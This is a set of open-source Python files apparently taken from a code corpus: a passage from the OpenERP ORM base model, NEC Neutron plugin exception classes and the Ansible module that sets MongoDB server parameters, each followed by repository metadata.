pleft = cr.fetchone()[0] or 0 cr.execute('update '+self._table+' set parent_left=parent_left+2 where parent_left>%s', (pleft,)) cr.execute('update '+self._table+' set parent_right=parent_right+2 where parent_right>%s', (pleft,)) cr.execute('update '+self._table+' set parent_left=%s,parent_right=%s where id=%s', (pleft+1, pleft+2, id_new)) # default element in context must be remove when call a one2many or many2many rel_context = context.copy() for c in context.items(): if c[0].startswith('default_'): del rel_context[c[0]] result = [] for field in upd_todo: result += self._columns[field].set(cr, self, id_new, field, vals[field], user, rel_context) or [] self._validate(cr, user, [id_new], context) if not context.get('no_store_function', False): result += self._store_get_values(cr, user, [id_new], vals.keys(), context) result.sort() done = [] for order, object, ids, fields2 in result: if not (object, ids, fields2) in done: self.pool.get(object)._store_set_values(cr, user, ids, fields2, context) done.append((object, ids, fields2)) if self._log_create and not (context and context.get('no_store_function', False)): message = self._description + \ " '" + \ self.name_get(cr, user, [id_new], context=context)[0][1] + \ "' " + _("created.") self.log(cr, user, id_new, message, True, context=context) wf_service = netsvc.LocalService("workflow") wf_service.trg_create(user, self._name, id_new, cr) return id_new def browse(self, cr, uid, select, context=None, list_class=None, fields_process=None): """Fetch records as objects allowing to use dot notation to browse fields and relations :param cr: database cursor :param uid: current user id :param select: id or list of ids. :param context: context arguments, like lang, time zone :rtype: object or list of objects requested """ self._list_class = list_class or browse_record_list cache = {} # need to accepts ints and longs because ids coming from a method # launched by button in the interface have a type long... if isinstance(select, (int, long)): return browse_record(cr, uid, select, self, cache, context=context, list_class=self._list_class, fields_process=fields_process) elif isinstance(select, list): return self._list_class([browse_record(cr, uid, id, self, cache, context=context, list_class=self._list_class, fields_process=fields_process) for id in select], context=context) else: return browse_null() def _store_get_values(self, cr, uid, ids, fields, context): """Returns an ordered list of fields.functions to call due to an update operation on ``fields`` of records with ``ids``, obtained by calling the 'store' functions of these fields, as setup by their 'store' attribute. :return: [(priority, model_name, [record_ids,], [function_fields,])] """ if fields is None: fields = [] stored_functions = self.pool._store_function.get(self._name, []) # use indexed names for the details of the stored_functions: model_name_, func_field_to_compute_, id_mapping_fnct_, trigger_fields_, priority_ = range(5) # only keep functions that should be triggered for the ``fields`` # being written to. to_compute = [f for f in stored_functions \ if ((not f[trigger_fields_]) or set(fields).intersection(f[trigger_fields_]))] mapping = {} for function in to_compute: # use admin user for accessing objects having rules defined on store fields target_ids = [id for id in function[id_mapping_fnct_](self, cr, SUPERUSER_ID, ids, context) if id] # the compound key must consider the priority and model name key = (function[priority_], function[model_name_]) for target_id in target_ids: mapping.setdefault(key, {}).setdefault(target_id,set()).add(tuple(function)) # Here mapping looks like: # { (10, 'model_a') : { target_id1: [ (function_1_tuple, function_2_tuple) ], ... } # (20, 'model_a') : { target_id2: [ (function_3_tuple, function_4_tuple) ], ... } # (99, 'model_a') : { target_id1: [ (function_5_tuple, function_6_tuple) ], ... } # } # Now we need to generate the batch function calls list # call_map = # { (10, 'model_a') : [(10, 'model_a', [record_ids,], [function_fields,])] } call_map = {} for ((priority,model), id_map) in mapping.iteritems(): functions_ids_maps = {} # function_ids_maps = # { (function_1_tuple, function_2_tuple) : [target_id1, target_id2, ..] } for id, functions in id_map.iteritems(): functions_ids_maps.setdefault(tuple(functions), []).append(id) for functions, ids in functions_ids_maps.iteritems(): call_map.setdefault((priority,model),[]).append((priority, model, ids, [f[func_field_to_compute_] for f in functions])) ordered_keys = call_map.keys() ordered_keys.sort() result = [] if ordered_keys: result = reduce(operator.add, (call_map[k] for k in ordered_keys)) return result def _store_set_values(self, cr, uid, ids, fields, context): """Calls the fields.function's "implementation function" for all ``fields``, on records with ``ids`` (taking care of respecting ``multi`` attributes), and stores the resulting values in the database directly.""" if not ids: return True field_flag = False field_dict = {} if self._log_access: cr.execute('select id,write_date from '+self._table+' where id IN %s', (tuple(ids),)) res = cr.fetchall() for r in res: if r[1]: field_dict.setdefault(r[0], []) res_date = time.strptime((r[1])[:19], '%Y-%m-%d %H:%M:%S') write_date = datetime.datetime.fromtimestamp(time.mktime(res_date)) for i in self.pool._store_function.get(self._name, []): if i[5]: up_write_date = write_date + datetime.timedelta(hours=i[5]) if datetime.datetime.now() < up_write_date: if i[1] in fields: field_dict[r[0]].append(i[1]) if not field_flag: field_flag = True todo = {} keys = [] for f in fields: if self._columns[f]._multi not in keys: keys.append(self._columns[f]._multi) todo.setdefault(self._columns[f]._multi, []) todo[self._columns[f]._multi].append(f) for key in keys: val = todo[key] if key: # use admin user for accessing objects having rules defined on store fields result = self._columns[val[0]].get(cr, self, ids, val, SUPERUSER_ID, context=context) for id, value in result.items(): if field_flag: for f in value.keys(): if f in field_dict[id]: value.pop(f) upd0 = [] upd1 = [] for v in value: if v not in val: continue if self._columns[v]._type in ('many2one', 'one2one'): try: value[v] = value[v][0] except: pass upd0.append('"'+v+'"='+self._columns[v]._symbol_set[0]) upd1.append(self._columns[v]._symbol_set[1](value[v])) upd1.append(id) if upd0 and upd1: cr.execute('update "' + self._table + '" set ' + \ ','.join(upd0) + ' where id = %s', upd1) else: for f in val: # use admin user for accessing objects having rules defined on store fields result = self._columns[f].get(cr, self, ids, f, SUPERUSER_ID, context=context) for r in result.keys(): if field_flag: if r in field_dict.keys(): if f in field_dict[r]: result.pop(r) for id, value in result.items(): if self._columns[f]._type in ('many2one', 'one2one'): try: value = value[0] except: pass cr.execute('update "' + self._table + '" set ' + \ '"'+f+'"='+self._columns[f]._symbol_set[0] + ' where id = %s', (self._columns[f]._symbol_set[1](value), id)) return True # # TODO: Validate # def perm_write(self, cr, user, ids, fields, context=None): raise NotImplementedError(_('This method does not exist anymore')) # TODO: ameliorer avec NULL def _where_calc(self, cr, user, domain, active_test=True, context=None): """Computes the WHERE clause needed to implement an OpenERP domain. :param domain: the domain to compute :type domain: list :param active_test: whether the default filtering of records with ``active`` field set to ``False`` should be applied. :return: the query expressing the given domain as provided in domain :rtype: osv.query.Query """ if not context: context = {} domain = domain[:] # if the object has a field named 'active', filter out all inactive # records unless they were explicitely asked for if 'active' in self._all_columns and (active_test and context.get('active_test', True)): if domain: # the item[0] trick below works for domain items and '&'/'|'/'!' # operators too if not any(item[0] == 'active' for item in domain): domain.insert(0, ('active', '=', 1)) else: domain = [('active', '=', 1)] if domain: e = expression.expression(cr, user, domain, self, context) tables = e.get_tables() where_clause, where_params = e.to_sql() where_clause = where_clause and [where_clause] or [] else: where_clause, where_params, tables = [], [], ['"%s"' % self._table] return Query(tables, where_clause, where_params) def _check_qorder(self, word): if not regex_order.match(word): raise except_orm(_('AccessError'), _('Invalid "order" specified. A valid "order" specification is a comma-separated list of valid field names (optionally followed by asc/desc for the direction)')) return True def _apply_ir_rules(self, cr, uid, query, mode='read', context=None): """Add what's missing in ``query`` to implement all appropriate ir.rules (using the ``model_name``'s rules or the current model's rules if ``model_name`` is None) :param query: the current query object """ def apply_rule(added_clause, added_params, added_tables, parent_model=None, child_object=None): if added_clause: if parent_model and child_object: # as inherited rules are being applied, we need to add the missing JOIN # to reach the parent table (if it was not JOINed yet in the query) child_object._inherits_join_add(child_object, parent_model, query) query.where_clause += added_clause query.where_clause_params += added_params for table in added_tables: if table not in query.tables: query.tables.append(table) return True return False # apply main rules on the object rule_obj = self.pool.get('ir.rule') apply_rule(*rule_obj.domain_get(cr, uid, self._name, mode, context=context)) # apply ir.rules from the parents (through _inherits) for inherited_model in self._inherits: kwargs = dict(parent_model=inherited_model, child_object=self) #workaround for python2.5 apply_rule(*rule_obj.domain_get(cr, uid, inherited_model, mode, context=context), **kwargs) def _generate_m2o_order_by(self, order_field, query): """ Add possibly missing JOIN to ``query`` and generate the ORDER BY clause for m2o fields, either native m2o fields or function/related fields that are stored, including intermediate JOINs for inheritance if required. :return: the qualified field name to use in an ORDER BY clause to sort by ``order_field`` """ if order_field not in self._columns and order_field in self._inherit_fields: # also add missing joins for reaching the table containing the m2o field qualified_field = self._inherits_join_calc(order_field, query) order_field_column = self._inherit_fields[order_field][2] else: qualified_field = '"%s"."%s"' % (self._table, order_field) order_field_column = self._columns[order_field] assert order_field_column._type == 'many2one', 'Invalid field passed to _generate_m2o_order_by()' if not order_field_column._classic_write and not getattr(order_field_column, 'store', False): _logger.debug("Many2one function/related fields must be stored " \ "to be used as ordering fields! Ignoring sorting for %s.%s", self._name, order_field) return # figure out the applicable order_by for the m2o dest_model = self.pool.get(order_field_column._obj) m2o_order = dest_model._order if not regex_order.match(m2o_order): # _order is complex, can't use it here, so we default to _rec_name m2o_order = dest_model._rec_name else: # extract the field names, to be able to qualify them and add desc/asc m2o_order_list = [] for order_part in m2o_order.split(","): m2o_order_list.append(order_part.strip().split(" ",1)[0].strip()) m2o_order = m2o_order_list # Join the dest m2o table if it's not joined yet. We use [LEFT] OUTER join here # as we don't want to exclude results that have NULL values for the m2o src_table, src_field = qualified_field.replace('"','').split('.', 1) query.join((src_table, dest_model._table, src_field, 'id'), outer=True) qualify = lambda field: '"%s"."%s"' % (dest_model._table, field) return map(qualify, m2o_order) if isinstance(m2o_order, list) else qualify(m2o_order) def _generate_order_by(self, order_spec, query): """ Attempt to consruct an appropriate ORDER BY clause based on order_spec, which must be a comma-separated list of valid field names, optionally followed by an ASC or DESC direction. :raise" except_orm in case order_spec is malformed """ order_by_clause = self._order if order_spec: order_by_elements = [] self._check_qorder(order_spec) for order_part in order_spec.split(','): order_split = order_part.strip().split(' ') order_field = order_split[0].strip() order_direction = order_split[1].strip() if len(order_split) == 2 else '' inner_clause = None if order_field == 'id': order_by_clause = '"%s"."%s"' % (self._table, order_field) elif order_field in self._columns: order_column = self._columns[order_field] if order_column._classic_read: inner_clause = '"%s"."%s"' % (self._table, order_field) elif order_column._type == 'many2one': inner_clause = self._generate_m2o_order_by(order_field, query) else: continue # ignore non-readable or "non-joinable" fields elif order_field in self._inherit_fields: parent_obj = self.pool.get(self._inherit_fields[order_field][3]) order_column = parent_obj._columns[order_field] if order_column._classic_read: inner_clause = self._inherits_join_calc(order_field, query) elif order_column._type == 'many2one': inner_clause = self._generate_m2o_order_by(order_field, query) else: continue # ignore non-readable or "non-joinable" fields if inner_clause: if isinstance(inner_clause, list): for clause in inner_clause: order_by_elements.append("%s %s" % (clause, order_direction)) else: order_by_elements.append("%s %s" % (inner_clause, order_direction)) if order_by_elements: order_by_clause = ",".join(order_by_elements) return order_by_clause and (' ORDER BY %s ' % order_by_clause) or '' def _search(self, cr, user, args, offset=0, limit=None, order=None, context=None, count=False, access_rights_uid=None): """ Private implementation of search() method, allowing specifying the uid to use for the access right check. This is useful for example when filling in the selection list for a drop-down and avoiding access rights errors, by specifying ``access_rights_uid=1`` to bypass access rights check, but not ir.rules! This is ok at the security level because this method is private and not callable through XML-RPC. :param access_rights_uid: optional user ID to use when checking access rights (not for ir.rules, this is only for ir.model.access) """ if context is None: context = {} self.check_read(cr, access_rights_uid or user) # For transient models, restrict acces to the current user, except for the super-user if self.is_transient() and self._log_access and user != SUPERUSER_ID: args = expression.AND(([('create_uid', '=', user)], args or [])) query = self._where_calc(cr, user, args, context=context) self._apply_ir_rules(cr, user, query, 'read', context=context) order_by = self._generate_order_by(order, query) from_clause, where_clause, where_clause_params = query.get_sql() limit_str = limit and ' limit %d' % limit or '' offset_str = offset and ' offset %d' % offset or '' where_str = where_clause and (" WHERE %s" % where_clause) or '' if count: cr.execute('SELECT count("%s".id) FROM ' % self._table + from_clause + where_str + limit_str + offset_str, where_clause_params) res = cr.fetchall() return res[0][0] cr.execute('SELECT "%s".id FROM ' % self._table + from_clause + where_str + order_by + limit_str + offset_str, where_clause_params) res = cr.fetchall() return [x[0] for x in res] # returns the different values ever entered for one field # this is used, for example, in the client when the user hits enter on # a char field def distinct_field_get(self, cr, uid, field, value, args=None, offset=0, limit=None): if not args: args = [] if field in self._inherit_fields: return self.pool.get(self._inherit_fields[field][0]).distinct_field_get(cr, uid, field, value, args, offset, limit) else: return self._columns[field].search(cr, self, args, field, value, offset, limit, uid) def copy_data(self, cr, uid, id, default=None, context=None): """ Copy given record's data with all its fields values :param cr: database cursor :param user: current user id :param id: id of the record to copy :param default: field values to override in the original values of the copied record :type default: dictionary :param context: context arguments, like lang, time zone :type context: dictionary :return: dictionary containing all the field values """ if context is None: context = {} # avoid recursion through already copied records in case of circular relationship seen_map = context.setdefault('__copy_data_seen',{}) if id in seen_map.setdefault(self._name,[]): return seen_map[self._name].append(id) if default is None: default = {} if 'state' not in default: if 'state' in self._defaults: if callable(self._defaults['state']): default['state'] = self._defaults['state'](self, cr, uid, context) else: default['state'] = self._defaults['state'] context_wo_lang = context.copy() if 'lang' in context: del context_wo_lang['lang'] data = self.read(cr, uid, [id,], context=context_wo_lang) if data: data = data[0] else: raise IndexError( _("Record #%d of %s not found, cannot copy!") %( id, self._name)) # TODO it seems fields_get can be replaced by _all_columns (no need for translation) fields = self.fields_get(cr, uid, context=context) for f in fields: ftype = fields[f]['type'] if self._log_access and f in LOG_ACCESS_COLUMNS: del data[f] if f in default: data[f] = default[f] elif 'function' in fields[f]: del data[f] elif ftype == 'many2one': try: data[f] = data[f] and data[f][0] except: pass elif ftype in ('one2many', 'one2one'): res = [] rel = self.pool.get(fields[f]['relation']) if data[f]: # duplicate following the order of the ids # because we'll rely on it later for copying # translations in copy_translation()! data[f].sort() for rel_id in data[f]: # the lines are first duplicated using the wrong (old) # parent but then are reassigned to the correct one thanks # to the (0, 0, ...) d = rel.copy_data(cr, uid, rel_id, context=context) if d: res.append((0, 0, d)) data[f] = res elif ftype == 'many2many': data[f] = [(6, 0, data[f])] del data['id'] # make sure we don't break the current parent_store structure and # force a clean recompute! for parent_column in ['parent_left', 'parent_right']: data.pop(parent_column, None) # Remove _inherits field's from data recursively, missing parents will # be created by create() (so that copy() copy everything). def remove_ids(inherits_dict): for parent_table in inherits_dict: del data[inherits_dict[parent_table]] remove_ids(self.pool.get(parent_table)._inherits) remove_ids(self._inherits) return data def copy_translations(self, cr, uid, old_id, new_id, context=None): if context is None: context = {} # avoid recursion through already copied records in case of circular relationship seen_map = context.setdefault('__copy_translations_seen',{}) if old_id in seen_map.setdefault(self._name,[]): return seen_map[self._name].append(old_id) trans_obj = self.pool.get('ir.translation') # TODO it seems fields_get can be replaced by _all_columns (no need for translation) fields = self.fields_get(cr, uid, context=context) translation_records = [] for field_name, field_def in fields.items(): # we must recursively copy the translations for o2o and o2m if field_def['type'] in ('one2one', 'one2many'): target_obj = self.pool.get(field_def['relation']) old_record, new_record = self.read(cr, uid, [old_id, new_id], [field_name], context=context) # here we rely on the order of the ids to match the translations # as foreseen in copy_data() old_children = sorted(old_record[field_name]) new_children = sorted(new_record[field_name]) for (old_child, new_child) in zip(old_children, new_children): target_obj.copy_translations(cr, uid, old_child, new_child, context=context) # and for translatable fields we keep them for copy elif field_def.get('translate'): trans_name = '' if field_name in self._columns: trans_name = self._name + "," + field_name elif field_name in self._inherit_fields: trans_name = self._inherit_fields[field_name][0] + "," + field_name if trans_name: trans_ids = trans_obj.search(cr, uid, [ ('name', '=', trans_name), ('res_id', '=', old_id) ]) translation_records.extend(trans_obj.read(cr, uid, trans_ids, context=context)) for record in translation_records: del record['id'] record['res_id'] = new_id trans_obj.create(cr, uid, record, context=context) def copy(self, cr, uid, id, default=None, context=None): """ Duplicate record with given id updating it with default values :param cr: database cursor :param uid: current user id :param id: id of the record to copy :param default: dictionary of field values to override in the original values of the copied record, e.g: ``{'field_name': overriden_value, ...}`` :type default: dictionary :param context: context arguments, like lang, time zone :type context: dictionary :return: id of the newly created record """ if context is None: context = {} context = context.copy() data = self.copy_data(cr, uid, id, default, context) new_id = self.create(cr, uid, data, context) self.copy_translations(cr, uid, id, new_id, context) return new_id def exists(self, cr, uid, ids, context=None): """Checks whether the given id or ids exist in this model, and return the list of ids that do. This is simple to use for a truth test on a browse_record:: if record.exists(): pass :param ids: id or list of ids to check for existence :type ids: int or [int] :return: the list of ids that currently exist, out of the given `ids` """ if type(ids) in (int, long): ids = [ids] query = 'SELECT id FROM "%s"' % (self._table) cr.execute(query + "WHERE ID IN %s", (tuple(ids),)) return [x[0] for x in cr.fetchall()] def check_recursion(self, cr, uid, ids, context=None, parent=None): _logger.warning("You are using deprecated %s.check_recursion(). Please use the '_check_recursion()' instead!" % \ self._name) assert parent is None or parent in self._columns or parent in self._inherit_fields,\ "The 'parent' parameter passed to check_recursion() must be None or a valid field name" return self._check_recursion(cr, uid, ids, context, parent) def _check_recursion(self, cr, uid, ids, context=None, parent=None): """ Verifies that there is no loop in a hierarchical structure of records, by following the parent relationship using the **parent** field until a loop is detected or until a top-level record is found. :param cr: database cursor :param uid: current user id :param ids: list of ids of records to check :param parent: optional parent field name (default: ``self._parent_name = parent_id``) :return: **True** if the operation can proceed safely, or **False** if an infinite loop is detected. """ if not parent: parent = self._parent_name ids_parent = ids[:] query = 'SELECT distinct "%s" FROM "%s" WHERE id IN %%s' % (parent, self._table) while ids_parent: ids_parent2 = [] for i in range(0, len(ids), cr.IN_MAX): sub_ids_parent = ids_parent[i:i+cr.IN_MAX] cr.execute(query, (tuple(sub_ids_parent),)) ids_parent2.extend(filter(None, map(lambda x: x[0], cr.fetchall()))) ids_parent = ids_parent2 for i in ids_parent: if i in ids: return False return True def _get_external_ids(self, cr, uid, ids, *args, **kwargs): """Retrieve the External ID(s) of any database record. **Synopsis**: ``_get_xml_ids(cr, uid, ids) -> { 'id': ['module.xml_id'] }`` :return: map of ids to the list of their fully qualified External IDs in the form ``module.key``, or an empty list when there's no External ID for a record, e.g.:: { 'id': ['module.ext_id', 'module.ext_id_bis'], 'id2': [] } """ ir_model_data = self.pool.get('ir.model.data') data_ids = ir_model_data.search(cr, uid, [('model', '=', self._name), ('res_id', 'in', ids)]) data_results = ir_model_data.read(cr, uid, data_ids, ['module', 'name', 'res_id']) result = {} for id in ids: # can't use dict.fromkeys() as the list would be shared! result[id] = [] for record in data_results: result[record['res_id']].append('%(module)s.%(name)s' % record) return result def get_external_id(self, cr, uid, ids, *args, **kwargs): """Retrieve the External ID of any database record, if there is one. This method works as a possible implementation for a function field, to be able to add it to any model object easily, referencing it as ``Model.get_external_id``. When multiple External IDs exist for a record, only one of them is returned (randomly). :return: map of ids to their fully qualified XML ID, defaulting to an empty string when there's none (to be usable as a function field), e.g.:: { 'id': 'module.ext_id', 'id2': '' } """ results = self._get_xml_ids(cr, uid, ids) for k, v in results.iteritems(): if results[k]: results[k] = v[0] else: results[k] = '' return results # backwards compatibility get_xml_id = get_external_id _get_xml_ids = _get_external_ids # Transience def is_transient(self): """ Return whether the model is transient. See TransientModel. """ return self._transient def _transient_clean_rows_older_than(self, cr, seconds): assert self._transient, "Model %s is not transient, it cannot be vacuumed!" % self._name cr.execute("SELECT id FROM " + self._table + " WHERE" " COALESCE(write_date, create_date, (now() at time zone 'UTC'))::timestamp <" " ((now() at time zone 'UTC') - interval %s)", ("%s seconds" % seconds,)) ids = [x[0] for x in cr.fetchall()] self.unlink(cr, SUPERUSER_ID, ids) def _transient_clean_old_rows(self, cr, count): assert self._transient, "Model %s is not transient, it cannot be vacuumed!" % self._name cr.execute( "SELECT id, COALESCE(write_date, create_date, (now() at time zone 'UTC'))::timestamp" " AS t FROM " + self._table + " ORDER BY t LIMIT %s", (count,)) ids = [x[0] for x in cr.fetchall()] self.unlink(cr, SUPERUSER_ID, ids) def _transient_vacuum(self, cr, uid, force=False): """Clean the transient records. This unlinks old records from the transient model tables whenever the "_transient_max_count" or "_max_age" conditions (if any) are reached. Actual cleaning will happen only once every "_transient_check_time" calls. This means this method can be called frequently called (e.g. whenever a new record is created). """ assert self._transient, "Model %s is not transient, it cannot be vacuumed!" % self._name self._transient_check_count += 1 if (not force) and (self._transient_check_count % self._transient_check_time): self._transient_check_count = 0 return True # Age-based expiration if self._transient_max_hours: self._transient_clean_rows_older_than(cr, self._transient_max_hours * 60 * 60) # Count-based expiration if self._transient_max_count: self._transient_clean_old_rows(cr, self._transient_max_count) return True def resolve_o2m_commands_to_record_dicts(self, cr, uid, field_name, o2m_commands, fields=None, context=None): """ Serializes o2m commands into record dictionaries (as if all the o2m records came from the database via a read()), and returns an iterable over these dictionaries. Because o2m commands might be creation commands, not all record ids will contain an ``id`` field. Commands matching an existing record (``UPDATE`` and ``LINK_TO``) will have an id. .. note:: ``CREATE``, ``UPDATE`` and ``LINK_TO`` stand for the o2m command codes ``0``, ``1`` and ``4`` respectively :param field_name: name of the o2m field matching the commands :type field_name: str :param o2m_commands: one2many commands to execute on ``field_name`` :type o2m_commands: list((int|False, int|False, dict|False)) :param fields: list of fields to read from the database, when applicable :type fields: list(str) :raises AssertionError: if a command is not ``CREATE``, ``UPDATE`` or ``LINK_TO`` :returns: o2m records in a shape similar to that returned by ``read()`` (except records may be missing the ``id`` field if they don't exist in db) :rtype: ``list(dict)`` """ o2m_model = self._all_columns[field_name].column._obj # convert single ids and pairs to tripled commands commands = [] for o2m_command in o2m_commands: if not isinstance(o2m_command, (list, tuple)): command = 4 commands.append((command, o2m_command, False)) elif len(o2m_command) == 1: (command,) = o2m_command commands.append((command, False, False)) elif len(o2m_command) == 2: command, id = o2m_command commands.append((command, id, False)) else: command = o2m_command[0] commands.append(o2m_command) assert command in (0, 1, 4), \ "Only CREATE, UPDATE and LINK_TO commands are supported in resolver" # extract records to read, by id, in a mapping dict ids_to_read = [id for (command, id, _) in commands if command in (1, 4)] records_by_id = dict( (record['id'], record) for record in self.pool.get(o2m_model).read( cr, uid, ids_to_read, fields=fields, context=context)) record_dicts = [] # merge record from db with record provided by command for command, id, record in commands: item = {} if command in (1, 4): item.update(records_by_id[id]) if command in (0, 1): item.update(record) record_dicts.append(item) return record_dicts # keep this import here, at top it will cause dependency cycle errors import expression class Model(BaseModel): """Main super-class for regular database-persisted OpenERP models. OpenERP models are created by inheriting from this class:: class user(Model): ... The system will later instantiate the class once per database (on which the class' module is installed). """ _auto = True _register = False # not visible in ORM registry, meant to be python-inherited only _transient = False # True in a TransientModel class TransientModel(BaseModel): """Model super-class for transient records, meant to be temporarily persisted, and regularly vaccuum-cleaned. A TransientModel has a simplified access rights management, all users can create new records, and may only access the records they created. The super-user has unrestricted access to all TransientModel records. """ _auto = True _register = False # not visible in ORM registry, meant to be python-inherited only _transient = True class AbstractModel(BaseModel): """Abstract Model super-class for creating an abstract class meant to be inherited by regular models (Models or TransientModels) but not meant to be usable on its own, or persisted. Technical note: we don't want to make AbstractModel the super-class of Model or BaseModel because it would not make sense to put the main definition of persistence methods such as create() in it, and still we should be able to override them within an AbstractModel. """ _auto = False # don't create any database backend for AbstractModels _register = False # not visible in ORM registry, meant to be python-inherited only _transient = False # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
subramani95/neutron
neutron/plugins/nec/common/exceptions.py
6
2883
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # # Copyright 2012 NEC Corporation. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # @author: Ryota MIBU from neutron.common import exceptions as qexc class OFCException(qexc.NeutronException): message = _("An OFC exception has occurred: %(reason)s") def __init__(self, **kwargs): super(OFCException, self).__init__(**kwargs) self.status = kwargs.get('status') self.err_msg = kwargs.get('err_msg') self.err_code = kwargs.get('err_code') class OFCResourceNotFound(qexc.NotFound): message = _("The specified OFC resource (%(resource)s) is not found.") class NECDBException(qexc.NeutronException): message = _("An exception occurred in NECPluginV2 DB: %(reason)s") class OFCMappingNotFound(qexc.NotFound): message = _("Neutron-OFC resource mapping for " "%(resource)s %(neutron_id)s is not found. " "It may be deleted during processing.") class OFCServiceUnavailable(OFCException): message = _("OFC returns Server Unavailable (503) " "(Retry-After=%(retry_after)s)") def __init__(self, **kwargs): super(OFCServiceUnavailable, self).__init__(**kwargs) self.retry_after = kwargs.get('retry_after') class PortInfoNotFound(qexc.NotFound): message = _("PortInfo %(id)s could not be found") class ProfilePortInfoInvalidDataPathId(qexc.InvalidInput): message = _('Invalid input for operation: ' 'datapath_id should be a hex string ' 'with at most 8 bytes') class ProfilePortInfoInvalidPortNo(qexc.InvalidInput): message = _('Invalid input for operation: ' 'port_no should be [0:65535]') class RouterExternalGatewayNotSupported(qexc.BadRequest): message = _("Router (provider=%(provider)s) does not support " "an external network") class ProviderNotFound(qexc.NotFound): message = _("Provider %(provider)s could not be found") class RouterOverLimit(qexc.Conflict): message = _("Cannot create more routers with provider=%(provider)s") class RouterProviderMismatch(qexc.Conflict): message = _("Provider of Router %(router_id)s is %(provider)s. " "This operation is supported only for router provider " "%(expected_provider)s.")
apache-2.0
pchauncey/ansible
lib/ansible/modules/database/mongodb/mongodb_parameter.py
29
6900
#!/usr/bin/python # -*- coding: utf-8 -*- # (c) 2016, Loic Blot <loic.blot@unix-experience.fr> # Sponsored by Infopro Digital. http://www.infopro-digital.com/ # Sponsored by E.T.A.I. http://www.etai.fr/ # # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: mongodb_parameter short_description: Change an administrative parameter on a MongoDB server. description: - Change an administrative parameter on a MongoDB server. version_added: "2.1" options: login_user: description: - The username used to authenticate with required: false default: null login_password: description: - The password used to authenticate with required: false default: null login_host: description: - The host running the database required: false default: localhost login_port: description: - The port to connect to required: false default: 27017 login_database: description: - The database where login credentials are stored required: false default: null replica_set: description: - Replica set to connect to (automatically connects to primary for writes) required: false default: null database: description: - The name of the database to add/remove the user from required: true ssl: description: - Whether to use an SSL connection when connecting to the database required: false default: false param: description: - MongoDB administrative parameter to modify required: true value: description: - MongoDB administrative parameter value to set required: true param_type: description: - Define the parameter value (str, int) required: false default: str notes: - Requires the pymongo Python package on the remote host, version 2.4.2+. This can be installed using pip or the OS package manager. @see http://api.mongodb.org/python/current/installation.html requirements: [ "pymongo" ] author: "Loic Blot (@nerzhul)" ''' EXAMPLES = ''' # Set MongoDB syncdelay to 60 (this is an int) - mongodb_parameter: param: syncdelay value: 60 param_type: int ''' RETURN = ''' before: description: value before modification returned: success type: string after: description: value after modification returned: success type: string ''' import os import traceback try: from pymongo.errors import ConnectionFailure from pymongo.errors import OperationFailure from pymongo import version as PyMongoVersion from pymongo import MongoClient except ImportError: try: # for older PyMongo 2.2 from pymongo import Connection as MongoClient except ImportError: pymongo_found = False else: pymongo_found = True else: pymongo_found = True from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.six.moves import configparser from ansible.module_utils._text import to_native # ========================================= # MongoDB module specific support methods. # def load_mongocnf(): config = configparser.RawConfigParser() mongocnf = os.path.expanduser('~/.mongodb.cnf') try: config.readfp(open(mongocnf)) creds = dict( user=config.get('client', 'user'), password=config.get('client', 'pass') ) except (configparser.NoOptionError, IOError): return False return creds # ========================================= # Module execution. # def main(): module = AnsibleModule( argument_spec=dict( login_user=dict(default=None), login_password=dict(default=None, no_log=True), login_host=dict(default='localhost'), login_port=dict(default=27017, type='int'), login_database=dict(default=None), replica_set=dict(default=None), param=dict(default=None, required=True), value=dict(default=None, required=True), param_type=dict(default="str", choices=['str', 'int']), ssl=dict(default=False, type='bool'), ) ) if not pymongo_found: module.fail_json(msg='the python pymongo module is required') login_user = module.params['login_user'] login_password = module.params['login_password'] login_host = module.params['login_host'] login_port = module.params['login_port'] login_database = module.params['login_database'] replica_set = module.params['replica_set'] ssl = module.params['ssl'] param = module.params['param'] param_type = module.params['param_type'] value = module.params['value'] # Verify parameter is coherent with specified type try: if param_type == 'int': value = int(value) except ValueError: module.fail_json(msg="value '%s' is not %s" % (value, param_type)) try: if replica_set: client = MongoClient(login_host, int(login_port), replicaset=replica_set, ssl=ssl) else: client = MongoClient(login_host, int(login_port), ssl=ssl) if login_user is None and login_password is None: mongocnf_creds = load_mongocnf() if mongocnf_creds is not False: login_user = mongocnf_creds['user'] login_password = mongocnf_creds['password'] elif login_password is None or login_user is None: module.fail_json(msg='when supplying login arguments, both login_user and login_password must be provided') if login_user is not None and login_password is not None: client.admin.authenticate(login_user, login_password, source=login_database) except ConnectionFailure as e: module.fail_json(msg='unable to connect to database: %s' % to_native(e), exception=traceback.format_exc()) db = client.admin try: after_value = db.command("setParameter", **{param: value}) except OperationFailure as e: module.fail_json(msg="unable to change parameter: %s" % to_native(e), exception=traceback.format_exc()) if "was" not in after_value: module.exit_json(changed=True, msg="Unable to determine old value, assume it changed.") else: module.exit_json(changed=(value != after_value["was"]), before=after_value["was"], after=value) if __name__ == '__main__': main()
gpl-3.0
nashve/mythbox
resources/src/mythbox/mythtv/protocol.py
5
9945
